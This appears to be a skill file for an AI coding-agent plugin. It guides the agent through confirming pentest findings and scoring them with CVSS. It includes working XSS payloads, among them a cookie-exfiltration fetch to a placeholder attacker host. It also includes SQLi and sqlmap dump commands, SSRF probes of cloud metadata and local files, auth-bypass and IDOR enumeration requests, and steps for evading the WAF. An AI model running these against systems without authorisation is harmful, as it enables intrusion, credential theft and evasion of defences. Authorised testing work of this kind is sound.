From superhackers
Use when a scanner or manual testing has identified a potential vulnerability that needs confirmation, when eliminating false positives from automated scan results, when determining real-world exploitability and impact of a finding, when collecting evidence for a security report, when chaining multiple low-severity issues into a higher-impact attack, or when verifying that a patch or remediation actually fixes a vulnerability.
npx claudepluginhub narlyseorg/superhackers --plugin superhackersThis skill uses the workspace's default tool permissions.
> **Run `bash $SUPERHACKERS_ROOT/scripts/detect-tools.sh` for tool availability, or read `$SUPERHACKERS_ROOT/TOOLCHAIN.md` for the full resolution protocol.** If a tool is missing, check the fallback chain.
Retrieves texts, DMs, one-time codes, and inspects threads in ECC workflows. Provides evidence of exact sources checked for verification before replies.
Delivers expertise for HS tariff classification, customs documentation, duty optimization, restricted party screening, and trade compliance across jurisdictions.
Process documents with Nutrient API: convert formats (PDF, DOCX, XLSX, images), OCR scans (100+ languages), extract text/tables, redact PII, sign, fill forms.
Run
bash $SUPERHACKERS_ROOT/scripts/detect-tools.shfor tool availability, or read$SUPERHACKERS_ROOT/TOOLCHAIN.mdfor the full resolution protocol. If a tool is missing, check the fallback chain. STEALTH CONFIGURATION: To avoid WAF/blocking during verification, source stealth profile before testing:bash $SUPERHACKERS_ROOT/scripts/stealth-profile.sh && eval "$(stealth_curl_headers)"Seeskills/stealth-techniques/SKILL.mdfor comprehensive stealth methodology.
| Tool | Required | Fallback | Install |
|---|---|---|---|
| curl | ✅ Yes | wget → python3 requests | Usually pre-installed |
| nuclei | ✅ Yes | nikto → manual curl verification | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| sqlmap | ⚡ Optional | manual curl injection payloads | pip3 install sqlmap |
| nikto | ⚡ Optional | nuclei → manual curl | brew install nikto / apt install nikto |
| BurpSuite | ⚡ Optional | mitmproxy (proxy) → curl direct | Commercial — install from portswigger.net |
| rg (ripgrep) | ⚡ Optional | grep → grep -E | brew install ripgrep / apt install ripgrep |
Cross-Platform Notes:
- macOS: Install GNU coreutils for
timeoutcommand:brew install coreutils(providesgtimeout)- Linux/WSL:
timeoutcommand is available by default- All platforms: Scripts use fallbacks if preferred tools unavailable
Before running any commands in this skill:
- Run
bash $SUPERHACKERS_ROOT/scripts/detect-tools.shif not already run this session- For any ❌ missing tool, use the fallback from the chain above
Add these functions to your shell session or script for cross-platform compatibility:
# Cross-platform timeout wrapper
run_with_timeout() {
local seconds="$1"
shift
if command -v timeout >/dev/null 2>&1; then
timeout "$seconds" "$@"
elif command -v gtimeout >/dev/null 2>&1; then
gtimeout "$seconds" "$@"
else
# Perl fallback for macOS without coreutils
perl -e 'use POSIX qw(SIGALRM); alarm shift; exec @ARGV or die "$!"' "$seconds" "$@"
fi
}
# Cross-platform grep wrapper
search_text() {
if command -v rg >/dev/null 2>&1; then
rg "$@"
else
grep -E "$@"
fi
}
CRITICAL: If SUPERHACKERS_ROOT is not set, auto-detect it first
# Auto-detect SUPERHACKERS_ROOT if not set
if [ -z "${SUPERHACKERS_ROOT:-}" ]; then
# Try common plugin cache paths
for path in \
"$HOME/.claude/plugins/cache/superhackers/superhackers/1.2.* \
"$HOME/.claude/plugins/cache/superhackers/superhackers/"* \
"$HOME/superhackers" \
"$(pwd)/superhackers"; do
if [ -d "$path" ] && [ -f "$path/scripts/detect-tools.sh" ]; then
export SUPERHACKERS_ROOT="$path"
echo "Auto-detected SUPERHACKERS_ROOT=$SUPERHACKERS_ROOT"
break
fi
done
fi
# Verify detection worked
if [ -z "${SUPERHACKERS_ROOT:-}" ] || [ ! -f "$SUPERHACKERS_ROOT/scripts/detect-tools.sh" ]; then
echo "ERROR: SUPERHACKERS_ROOT not set and auto-detection failed"
echo "Please set: export SUPERHACKERS_ROOT=/path/to/superhackers"
return 1
fi
MANDATORY: All verification commands MUST follow this protocol:
Timeout on verification requests: Don't hang on non-responsive targets
# Standard timeout for manual verification (15 seconds)
run_with_timeout 15 curl -s -X POST https://target.com/api/test
# Longer timeout for nuclei re-verification (30 seconds)
run_with_timeout 30 nuclei -u https://target.com -id vuln-id
Validate vulnerability confirmation
OUTPUT=$(run_with_timeout 15 curl -s -X POST \
-H "Content-Type: application/json" \
-d '{"test": "payload"}' \
-w "\n%{http_code}" \
https://target.com/vulnerable-endpoint 2>&1)
EXIT_CODE=$?
HTTP_CODE=$(echo "$OUTPUT" | tail -1)
BODY=$(echo "$OUTPUT" | head -n -1)
# Note: timeout returns 124 on timeout, 0 if no timeout wrapper used
if [ $EXIT_CODE -eq 124 ] 2>/dev/null; then
echo "TOOL_FAILURE: Verification timeout after 15 seconds"
echo "RESULT: Unable to confirm vulnerability (target unresponsive)"
# Mark as requiring manual verification
elif [ $EXIT_CODE -ne 0 ]; then
echo "TOOL_FAILURE: curl failed with exit code $EXIT_CODE"
# Try fallback method
fi
# Check for vulnerability indicators (cross-platform)
case "$HTTP_CODE" in
200)
if echo "$BODY" | search_text -q "error|mysql|syntax"; then
echo "CONFIRMED: Vulnerability verified - injection reflected in response"
else
echo "INCONCLUSIVE: Request succeeded but no clear vulnerability indicator"
fi
;;
400|403|404)
echo "RESULT: Vulnerability appears mitigated (blocked by security controls)"
;;
000)
echo "TOOL_FAILURE: Connection failed during verification"
;;
esac
Retry logic for verification
# Max 3 verification attempts
# Attempt 1: Direct payload testing
# Attempt 2: Modified payload (encoded variants)
# Attempt 3: Alternative verification method
Fallback for nuclei-based verification
# Primary: nuclei with specific template
run_with_timeout 30 nuclei -u https://target.com -id vuln-template 2>/dev/null
if [ $? -ne 0 ]; then
echo "FALLBACK: nuclei failed, trying nikto"
run_with_timeout 30 nikto -h https://target.com
if [ $? -ne 0 ]; then
echo "FALLBACK: Manual curl-based verification"
# Manual verification with curl
fi
fi
Vulnerability verification is the critical bridge between "scanner says vulnerable" and "confirmed exploitable with X impact." Most scanners produce 30-70% false positives. This skill covers the methodology for confirming vulnerabilities, eliminating noise, assessing real impact, collecting court-grade evidence, and demonstrating exploitability without causing damage.
Position: Phase 4 (Verification) — after testing skills, before
writing-security-reportsExpected Input: Raw findings from testing skills (webapp-pentesting,api-pentesting,infra-pentesting, etc.) Your Output: Verified findings with evidence, confidence levels, and classification (Confirmed / Mitigated / False Positive / Out of Scope) Consumed By:exploit-development(for confirmed vulns needing PoC),writing-security-reports(for final report) Critical: Unverified findings must NOT reach the final report. You are the quality gate.
Every finding in a pentest report must be verified, reproducible, and evidenced. Unverified findings destroy credibility.
REQUIRED SUB-SKILL: Use superhackers:exploit-development when custom exploit code is needed to confirm a vulnerability.
1. INITIAL TRIAGE
├── Review scanner output (severity, confidence, details)
├── Understand the vulnerability class
├── Assess likelihood of false positive
└── Prioritize: Critical/High first, then Medium, then Low
2. MANUAL CONFIRMATION
├── Reproduce the finding manually
├── Verify across different conditions (auth levels, browsers, methods)
├── Determine root cause
└── Confirm it's not a false positive
3. IMPACT ASSESSMENT
├── Determine what an attacker can achieve
├── Test exploitability boundaries (scope, data access, privilege level)
├── Identify affected users/data/systems
└── Consider chaining with other findings
4. EVIDENCE COLLECTION
├── Capture HTTP request/response pairs
├── Take screenshots of exploitation
├── Record command output
├── Document step-by-step reproduction
└── Sanitize sensitive data in evidence
5. SEVERITY SCORING
├── Calculate CVSS base score
├── Apply temporal and environmental adjustments
├── Map to organizational risk rating
└── Justify severity with evidence
6. DOCUMENTATION → Feed into report
Before applying the Verification Decision Matrix, assess your confidence level:
| Level | Criteria | Action |
|---|---|---|
| HIGH | Exploit succeeded, response proves impact, reproduced 2+ times | Apply Verification Decision Matrix directly |
| MEDIUM | Behavior suggests vulnerability but compensating control may exist, or reproduced only once | Downgrade one severity level from matrix result |
| LOW | Theoretical only — inferred from code/config but not confirmed via live testing | Mark "Needs Investigation" regardless of scanner severity |
Rule: When uncertain between two confidence levels, round DOWN. False positives destroy credibility faster than missed findings.
ABSOLUTE RULE: Every finding must exit verification in one of exactly six states: CONFIRMED, FALSE POSITIVE, MITIGATED, OUT OF SCOPE, INCONCLUSIVE, or TOOLS_UNVERIFIABLE. "Not confirmed", "Possible", "Maybe", "TBD", and "Needs investigation" are FORBIDDEN as final states in any deliverable. A finding stuck in INVESTIGATE state is an INCOMPLETE finding — the engagement is not done until it resolves.
Scanner says | Manual test | Verdict
----------------|-----------------|------------------
Critical/High | Reproduces | CONFIRMED — document immediately
Critical/High | Doesn't repro | Investigate deeper — may need auth/conditions
Medium | Reproduces | CONFIRMED — assess real impact
Medium | Doesn't repro | Likely false positive — note and move on
Low/Info | Reproduces | CONFIRMED — check if chainable
Low/Info | Doesn't repro | FALSE POSITIVE — discard
Any | Partially works | INVESTIGATE — apply Bypass Exhaustion Protocol; must resolve to a final state
Final State Definitions:
| State | Meaning | Evidence Required |
|---|---|---|
| CONFIRMED | Vulnerability exists and is exploitable | Reproduction steps + request/response evidence |
| FALSE POSITIVE | Tool fired incorrectly; vulnerability does not exist | Evidence showing the vulnerable code path does not execute |
| MITIGATED | Vulnerability exists but a control prevents exploitation | Control identified (WAF rule, input validation, param query) + bypass attempts documented |
| OUT OF SCOPE | Endpoint/target not within agreed engagement scope | Scope definition reference |
| INCONCLUSIVE | Multiple vantage points tested; a specific external constraint prevents definitive conclusion | Network-layer evidence: exact error type (timeout vs ICMP unreachable vs RST vs WAF 403), source IP used, at minimum 2 different vantage points attempted |
| TOOLS_UNVERIFIABLE | All primary and fallback tools failed; cannot execute the test | All tools attempted + specific failure for each: crash output, error code, or "not installed" + remediation steps to unblock |
TOOLS_UNVERIFIABLE is only permitted when ALL of the following are true:
- The primary tool AND all fallback tools from the tool chain were attempted
- Each failure is documented with specific error output (not "tool failed")
- You have attempted to install or substitute an alternative (e.g., Python script for curl)
- The failure is environmental (tool unavailable, dependency missing) — not a network issue (which → INCONCLUSIVE)
A finding marked TOOLS_UNVERIFIABLE must include: "Re-verify when [specific tool] is available."
INCONCLUSIVE is only permitted when ALL of the following are true:
- You tested from at least 2 distinct network vantage points (different IPs, different exit regions)
- You documented the specific network-layer behavior (not "likely blocked" — specific: "TCP SYN timeout after 30s from vantage 1; ICMP port-unreachable type 3 from vantage 2")
- You applied all 3+ bypass techniques from the Bypass Exhaustion Protocol
- The block cannot be attributed to a testable security control (if it can, classify as MITIGATED)
"Inconclusive — likely blocked at network level" without specific evidence is FORBIDDEN. It is the same failure mode as "Not confirmed."
Before verifying any finding from an automated scanner, confirm the scanner actually produced valid output:
bash $SUPERHACKERS_ROOT/scripts/validate-output.sh <scanner_name> <output_file> <exit_code>
If VALIDATION=failed for the scanner that produced the finding, the finding itself is UNRELIABLE. Re-run the scanner with corrected configuration before attempting verification. Do NOT mark a finding as "False Positive" just because the verification scan produced empty output — that's a tool failure, not a verification result.
CRITICAL — Tool Failure vs. Test Result (NON-NEGOTIABLE):
| Situation | Classification | Action |
|---|---|---|
| Tool ran, produced output, showed no vulnerability | Not Vulnerable | Document the tool command, output summary, conclusion |
| Tool ran, output empty/no-output-file | Tool Failure | Re-run; cannot be reported as any test result |
| Tool timed out, no output | Tool Failure | Re-run with reduced scope/timeout; cannot be reported |
| Tool crashed (non-zero exit, empty stderr) | Tool Failure | Switch to fallback tool; cannot be reported |
| Tool ran, output shows partial coverage | Incomplete | Re-run covering missing scope; cannot be reported as complete |
"A tool timed out therefore this is Not Confirmed" is a category error. Timeout = tool failure = re-run required. The only acceptable report entry from a tool failure is "Test not completed due to tool failure — see [engagement notes] for re-run status."
Component/Plugin Version Enumeration Completeness:
?ver= artifacts, response header patternsBefore classifying ANY finding as False Positive, you MUST complete all of the following:
Attempt 3+ distinct bypass techniques appropriate to the vulnerability class:
Escalate methodology: manual testing (curl/browser) → automated tool (sqlmap/ffuf/nuclei) → custom payload crafted for the specific context
Apply the control-vs-constraint question:
Only then may you classify as False Positive — meaning the vulnerability genuinely does not exist
Critical distinction: Mitigated ≠ False Positive.
# Re-run nuclei with specific template for a finding
nuclei -u https://target.com -t /path/to/specific-template.yaml -debug
# Nikto — targeted scan for specific checks
nikto -h https://target.com -Tuning x
# Manual HTTP request verification with curl
curl -v -k https://target.com/vulnerable-endpoint
# Proxy through BurpSuite for detailed analysis
curl -v -k --proxy http://127.0.0.1:8080 https://target.com/vulnerable-endpoint
# Test with different HTTP methods
for method in GET POST PUT DELETE PATCH OPTIONS HEAD; do
echo "=== $method ==="
curl -s -o /dev/null -w "%{http_code}" -X $method https://target.com/endpoint
done
Goal: Prove script execution in victim's browser context, not just alert(1).
# Step 1: Reproduce the scanner finding
# Inject the exact payload the scanner used — check if it executes
# Step 2: Determine XSS type
# Reflected: payload in URL/request, reflected in response
curl -s "https://target.com/search?q=<script>alert(1)</script>" | search_text -i "script"
# Stored: payload persisted, appears on subsequent page loads
# Submit payload, then visit the page without the payload in URL
# DOM-based: payload processed by client-side JavaScript
# Check page source — if injection point is in JS context, it's DOM-based
# Step 3: Prove real impact (not just alert box)
# Cookie access proof
<script>fetch('https://ATTACKER/steal?c='+document.cookie)</script>
# Session token accessible?
<script>document.write('<p>Cookie: '+document.cookie+'</p>')</script>
# DOM manipulation proof (shows attacker control)
<script>document.body.innerHTML='<h1>XSS by Tester</h1>'</script>
# Step 4: Test filter bypasses if initial payload blocked
# See exploit-development skill for bypass payloads
# Step 5: Evidence collection
# Screenshot 1: The request containing the XSS payload
# Screenshot 2: The response/rendered page showing execution
# Screenshot 3: Proof of cookie access or DOM control
# Save full HTTP request and response
# Step 6: Determine scope
# HttpOnly flag on session cookie? → limits cookie theft but DOM control still severe
# CSP header present? → may limit script execution
curl -s -I https://target.com | search_text -i "content-security-policy|x-xss-protection|set-cookie"
XSS Severity Guide:
| Scenario | CVSS Impact | Notes |
|---|---|---|
| Reflected, self-XSS only | Low (3.1-3.9) | Requires victim to click crafted link |
| Reflected, cookie theft possible | Medium (5.4-6.1) | No HttpOnly, session hijack possible |
| Stored XSS, any user sees it | High (6.1-8.0) | Persistent, affects all visitors |
| Stored XSS + admin context | Critical (8.0-9.0) | Can lead to full application takeover |
| DOM XSS + no CSP | Medium-High (5.4-7.5) | Depends on context and data access |
Goal: Prove data extraction capability, not just error messages.
# Step 1: Confirm error-based SQLi
curl -s "https://target.com/page?id=1'" | search_text -i "sql|syntax|mysql|postgres|oracle|sqlite"
# Step 2: Confirm boolean-based blind SQLi
# True condition — normal response
curl -s "https://target.com/page?id=1 AND 1=1" -o true.html
# False condition — different response
curl -s "https://target.com/page?id=1 AND 1=2" -o false.html
# Compare
diff true.html false.html
# Step 3: Confirm time-based blind SQLi
# Delayed response = injectable
time curl -s "https://target.com/page?id=1; WAITFOR DELAY '0:0:5'--"
time curl -s "https://target.com/page?id=1' AND SLEEP(5)--+"
# Step 4: Prove data extraction with sqlmap
sqlmap -u "https://target.com/page?id=1" --batch --technique=BEUSTQ --dbs \
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
--delay=2-5 --randomize --threads=1
# Step 5: Extract a sample of data (NOT full dump in verification phase)
sqlmap -u "https://target.com/page?id=1" --batch -D database_name -T users --dump --limit 3 \
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
--delay=2-5 --randomize --threads=1
# Step 6: Check privilege level
sqlmap -u "https://target.com/page?id=1" --batch --current-user --is-dba --privileges \
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
--delay=2-5 --randomize --threads=1
# Step 7: Evidence collection
# Save: the vulnerable parameter, the sqlmap output, sample extracted data
# Sanitize: redact actual passwords/PII from evidence — show structure not content
# Step 8: Test with proxy for clean request/response capture
sqlmap -u "https://target.com/page?id=1" --proxy="http://127.0.0.1:8080" --batch --dbs \
--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" \
--delay=2-5 --randomize --threads=1
SQLi Severity Guide:
| Scenario | CVSS Impact | Notes |
|---|---|---|
| Error-based, no data extraction | Medium (4.3-5.3) | Information disclosure only |
| Blind SQLi, data extractable | High (7.5-8.6) | Full DB read access |
| SQLi with DBA privileges | Critical (8.6-9.8) | OS command exec, file read/write |
| SQLi with stacked queries | Critical (9.0-9.8) | Full DB control, data modification |
Goal: Prove internal network access or cloud metadata retrieval.
# Step 1: Test basic SSRF — does the server make outbound requests?
# Use a webhook/callback service to confirm
curl -s "https://target.com/fetch?url=https://ATTACKER_WEBHOOK/"
# Check webhook for incoming request from target's IP
# Step 2: Test internal network access
curl -s "https://target.com/fetch?url=http://127.0.0.1:80"
curl -s "https://target.com/fetch?url=http://127.0.0.1:22"
curl -s "https://target.com/fetch?url=http://192.168.1.1/"
# Step 3: Test cloud metadata access (CRITICAL)
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/"
curl -s "https://target.com/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
# Step 4: Test filter bypasses if basic URLs blocked
curl -s "https://target.com/fetch?url=http://0x7f000001/" # Hex IP
curl -s "https://target.com/fetch?url=http://2130706433/" # Decimal IP
curl -s "https://target.com/fetch?url=http://127.1/" # Short form
curl -s "https://target.com/fetch?url=http://[::1]/" # IPv6 loopback
curl -s "https://target.com/fetch?url=http://127.0.0.1.nip.io/" # DNS rebinding
# Step 5: Test protocol handlers
curl -s "https://target.com/fetch?url=file:///etc/passwd"
curl -s "https://target.com/fetch?url=dict://127.0.0.1:6379/info"
curl -s "https://target.com/fetch?url=gopher://127.0.0.1:6379/_INFO"
# Step 6: Internal port scan via SSRF (prove scope of access)
for port in 22 80 443 3306 5432 6379 8080 9200 27017; do
resp=$(curl -s -o /dev/null -w "%{http_code}:%{time_total}" \
"https://target.com/fetch?url=http://127.0.0.1:$port" --max-time 5)
echo "Port $port: $resp"
done
# Step 7: Evidence
# Save: vulnerable endpoint, proof of internal access, metadata retrieved
# Critical evidence: cloud credentials, internal service banners, file contents
Goal: Prove unauthorized access to another user's resources.
# Step 1: Identify the pattern
# User A accesses: GET /api/users/100/profile
# Change to User B: GET /api/users/101/profile
# Step 2: Test horizontal privilege escalation
# Authenticated as User A (ID=100)
curl -s -H "Authorization: Bearer TOKEN_A" "https://target.com/api/users/100/profile"
# Try accessing User B's data (ID=101)
curl -s -H "Authorization: Bearer TOKEN_A" "https://target.com/api/users/101/profile"
# Step 3: Test vertical privilege escalation
# Regular user trying admin endpoints
curl -s -H "Authorization: Bearer REGULAR_TOKEN" "https://target.com/api/admin/users"
curl -s -H "Authorization: Bearer REGULAR_TOKEN" "https://target.com/api/admin/settings"
# Step 4: Test with no authentication
curl -s "https://target.com/api/users/100/profile"
# Step 5: Test predictable IDs
# Sequential: 100, 101, 102, ...
# UUID: try known UUIDs from other endpoints or leaked data
# Step 6: Evidence collection
# Screenshot showing: request as User A → response with User B's data
# Compare: response for own data vs response for other user's data
# Critical: show DIFFERENT data returned, proving cross-user access
# Step 7: Assess scope
# How many records accessible? (enumerate a range)
for id in $(seq 1 10); do
code=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: Bearer TOKEN_A" \
"https://target.com/api/users/$id/profile")
echo "ID $id: HTTP $code"
done
# Step 1: Test direct access to protected endpoints without auth
curl -s "https://target.com/admin/dashboard"
curl -s "https://target.com/api/admin/users"
# Step 2: Test with manipulated tokens/cookies
# Remove auth header entirely
curl -s "https://target.com/api/protected-endpoint"
# Empty auth header
curl -s -H "Authorization: " "https://target.com/api/protected-endpoint"
# Manipulated JWT (change role claim)
# Decode JWT, modify payload, re-encode (without signature for alg:none)
# Step 3: Test HTTP method override
curl -s -X POST "https://target.com/admin/dashboard"
curl -s -H "X-HTTP-Method-Override: GET" -X POST "https://target.com/admin/dashboard"
# Step 4: Test path traversal to bypass auth
curl -s "https://target.com/admin/../admin/dashboard"
curl -s "https://target.com/ADMIN/dashboard"
curl -s "https://target.com/admin/./dashboard"
curl -s "https://target.com/%61dmin/dashboard"
# Step 5: Evidence
# Show: request without valid auth → response with protected content
# Compare: authenticated admin response vs bypass response
# Custom template to verify a specific finding
id: custom-ssrf-verification
info:
name: SSRF Verification - Internal Metadata Access
author: pentest-team
severity: critical
description: Verifies SSRF allows access to cloud instance metadata
tags: ssrf,custom,verification
requests:
- method: GET
path:
- "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/"
matchers-condition: and
matchers:
- type: word
words:
- "ami-id"
- "instance-id"
- "security-credentials"
condition: or
- type: status
status:
- 200
- method: GET
path:
- "{{BaseURL}}/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/"
matchers:
- type: regex
regex:
- "[A-Z0-9]{20}" # AWS access key pattern
# Template for verifying SQL injection
id: custom-sqli-verification
info:
name: SQLi Verification - Error Based
author: pentest-team
severity: high
description: Confirms SQL injection via error-based technique
tags: sqli,custom,verification
requests:
- method: GET
path:
- "{{BaseURL}}/page?id=1'"
matchers-condition: and
matchers:
- type: word
words:
- "SQL syntax"
- "mysql_fetch"
- "ORA-"
- "PostgreSQL"
- "sqlite3"
- "ODBC"
- "unclosed quotation"
condition: or
- type: status
status:
- 200
- 500
# Run custom verification templates
nuclei -u https://target.com -t custom-templates/ -debug -proxy http://127.0.0.1:8080
COMMON FALSE POSITIVE PATTERNS:
1. Version-based detection only
Scanner: "Apache 2.4.49 — CVE-2021-41773 Path Traversal"
Reality: May be patched via backport, or .htaccess mitigates
Action: Test manually: curl https://target/cgi-bin/.%2e/.%2e/etc/passwd
2. Header-based detection
Scanner: "Missing X-Frame-Options"
Reality: CSP frame-ancestors may be set instead
Action: Check full response headers, look for CSP
3. Generic template matches
Scanner: "Potential open redirect"
Reality: Redirect is to same domain, or parameterized within app
Action: Test with external domain: ?redirect=https://evil.com
4. WAF/proxy interference
Scanner: "Blind XSS detected (reflection found)"
Reality: WAF stripped dangerous characters, only benign text reflected
Action: Check if script actually executes in browser
5. Authenticated vs unauthenticated
Scanner: "Sensitive data exposure at /api/users"
Reality: Endpoint requires valid authentication
Action: Test without auth token — confirm 401/403
6. Rate-limiting obscuring results
Scanner: "Multiple vulnerabilities detected"
Reality: WAF started blocking after N requests, returning error pages
Action: Re-test individual findings at low rate
ELIMINATION CHECKLIST:
□ Can I reproduce manually?
□ Does the response actually contain exploitable output?
□ Is the behavior consistent across multiple attempts?
□ Does it work without scanner-specific headers/conditions?
□ Am I testing the application or a proxy/WAF/CDN?
IMPACT PROOF GUIDELINES:
1. DATA ACCESS — Prove what data is accessible
- Extract 3-5 sample records, not full tables
- Redact PII in screenshots (blur SSN, CC, passwords)
- Show record count: "3,847,291 records accessible"
- Show column names to demonstrate data types at risk
2. PRIVILEGE ESCALATION — Prove the access level gained
- Show the username/role of the compromised context
- Demonstrate one admin action (read admin page, not delete data)
- Show what COULD be done vs what WAS done
3. REMOTE CODE EXECUTION — Prove command execution
- Run: id, whoami, hostname (harmless commands only)
- Show network access: ifconfig/ipconfig
- NEVER: rm, format, delete, modify production data
- NEVER: install backdoors outside scope
4. SSRF — Prove internal access
- Read metadata endpoint
- Port scan localhost
- NEVER: actually use stolen cloud credentials
- Document credential format to prove access level
5. CHAIN EXPLOITATION — Show combined impact
- Document each step of the chain
- Show how Low + Low = High
- Example: Info disclosure → credential access → admin takeover
CVSS v4.0 BASE SCORE COMPONENTS:
CVSS 4.0 uses a lookup-based algorithm rather than a simple formula with
individual metric weights. Use the FIRST calculator or Python cvss library
for accurate scores.
| Metric | Values | Description |
|--------|--------|-------------|
| AV | N, A, L, P | Attack Vector |
| AC | L, H | Attack Complexity |
| AT | N, P | Attack Requirements (NEW) |
| PR | N, L, H | Privileges Required |
| UI | N, P, A | User Interaction (changed: P=passive, A=active) |
| VC | H, L, N | Confidentiality impact on vulnerable system |
| VI | H, L, N | Integrity impact on vulnerable system |
| VA | H, L, N | Availability impact on vulnerable system |
| SC | H, L, N | Confidentiality impact on subsequent systems |
| SI | H, L, N | Integrity impact on subsequent systems |
| SA | H, L, N | Availability impact on subsequent systems |
COMMON VULNERABILITY CVSS MAPPINGS:
Unauthenticated RCE: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N = 9.3
Auth bypass to admin: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N = 9.3
Unauthenticated SQLi (data): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N = 8.7
Stored XSS (any user): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.1
Reflected XSS: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.3
IDOR (read other user data): CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N = 7.1
SSRF (internal access): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N = 7.7
SSRF (metadata creds): CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:H/SA:H = 9.3
Missing security headers: Informational — not scored
Open redirect: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N = 5.3
# Step 1: Document the original vulnerability
# Save: original request, response, exploitation evidence
# Step 2: Verify the fix is deployed
# Check version, patch level, or deployment timestamp
curl -s -I https://target.com | search_text -i "server|x-powered-by|x-version"
# Step 3: Replay the exact original exploit
# Use saved curl command / BurpSuite repeater
curl -v -k "https://target.com/page?id=1'" 2>&1 | tee regression/sqli_retest.txt
# Step 4: Try bypass variations
# If original was blocked, try:
# - Different encoding (URL encode, double encode, unicode)
# - Different injection point (header, cookie, POST body)
# - Alternative payloads (different SQL syntax, different XSS vector)
# Step 5: Test adjacent functionality
# If /page?id= was fixed, also test:
# - /other-page?id=
# - /api/page?id=
# - POST /page with id in body
# Step 6: Nuclei re-scan with original template
nuclei -u https://target.com -t /path/to/original-finding-template.yaml -debug
# Step 7: Document result
# FIXED: original exploit no longer works, bypasses fail
# PARTIALLY FIXED: original blocked but bypass works
# NOT FIXED: original exploit still works
# REGRESSION: fix introduced new vulnerability
CHAIN 1: Information Disclosure → Account Takeover
Step 1: IDOR at /api/users/ID → leaks email + password reset token
Step 2: Use token to reset admin password
Step 3: Login as admin
Individual: IDOR=Medium, Token leak=Medium
Chained: Critical (full account takeover)
CHAIN 2: SSRF → Cloud Credential Theft → Data Breach
Step 1: SSRF via image proxy → access metadata endpoint
Step 2: Retrieve IAM credentials from metadata
Step 3: Use creds to access S3 buckets with customer data
Individual: SSRF=High, Misconfigured IAM=Medium
Chained: Critical (full cloud compromise)
CHAIN 3: XSS → Session Hijack → Admin Access
Step 1: Stored XSS in user profile bio field
Step 2: Admin views user profile → XSS fires
Step 3: Exfiltrate admin session cookie (no HttpOnly)
Step 4: Use admin session to access admin panel
Individual: Stored XSS=Medium, Missing HttpOnly=Low
Chained: High-Critical (admin access via non-privileged user)
CHAIN 4: Open Redirect → OAuth Token Theft
Step 1: Open redirect at /callback?next=URL
Step 2: Craft OAuth flow to redirect auth code to attacker
Step 3: Exchange stolen auth code for access token
Individual: Open Redirect=Low, OAuth misconfiguration=Medium
Chained: High (account takeover via OAuth)
CHAIN 5: LFI → Source Code → Hardcoded Creds → RCE
Step 1: LFI reads application source code
Step 2: Source code contains database credentials
Step 3: Database access enables SQL-based command execution
Individual: LFI=Medium, Hardcoded creds=Medium
Chained: Critical (remote code execution)
DOCUMENTATION FORMAT FOR CHAINS:
- Number each step clearly
- Show evidence for each step
- Explain why each step enables the next
- Score the chain as a whole, referencing individual components
- Note: chains often have higher CVSS than any individual component
FOR EVERY CONFIRMED VULNERABILITY:
□ Unique finding ID (e.g., VULN-001)
□ Vulnerability title (clear, specific)
□ Affected URL/endpoint/IP:port
□ HTTP method and parameters
□ Full HTTP request (redacted if needed)
□ Full HTTP response (redacted if needed)
□ Screenshot of exploitation
□ Step-by-step reproduction instructions
□ CVSS score with vector string
□ Remediation recommendation
□ References (CVE, CWE, OWASP)
EVIDENCE FORMAT:
- Screenshots: PNG, annotated with arrows/highlights
- HTTP traffic: save as .txt or export from BurpSuite
- Command output: full terminal copy, with timestamps
- Data samples: 3-5 records max, PII redacted
SANITIZATION RULES:
- Replace real passwords with [REDACTED]
- Blur/redact SSN, credit cards, personal data in screenshots
- Keep enough structure to prove the vulnerability
- Never include full credential dumps in reports
Accepting scanner results at face value — Scanners lie. A "Critical" finding from nuclei might be a version-based guess that's actually patched. Always verify manually before reporting.
Stopping at alert(1) — An XSS alert(1) proves script execution exists but doesn't demonstrate real impact. Show cookie theft, DOM manipulation, or session hijacking to convey actual risk.
Not testing false positive indicators — WAFs, CDNs, and proxies modify responses. Your "SQLi" might be the WAF error page, not a database error. Verify you're seeing the application's response, not a security appliance.
Dumping entire databases — For verification, you need 3-5 sample records, not 100,000 rows. Full dumps waste time, risk exposure, and may violate engagement scope.
Ignoring chain opportunities — A "Low" IDOR + "Low" info disclosure might chain into a "Critical" account takeover. Always consider how findings combine.
Not testing remediation thoroughly — Confirming the original payload fails is insufficient. Test bypass variations, alternative injection points, and encoding tricks. Weak patches create false confidence.
Missing context in evidence — A screenshot of extracted data without showing the request that caused it is useless. Always capture the full request → response → impact chain.
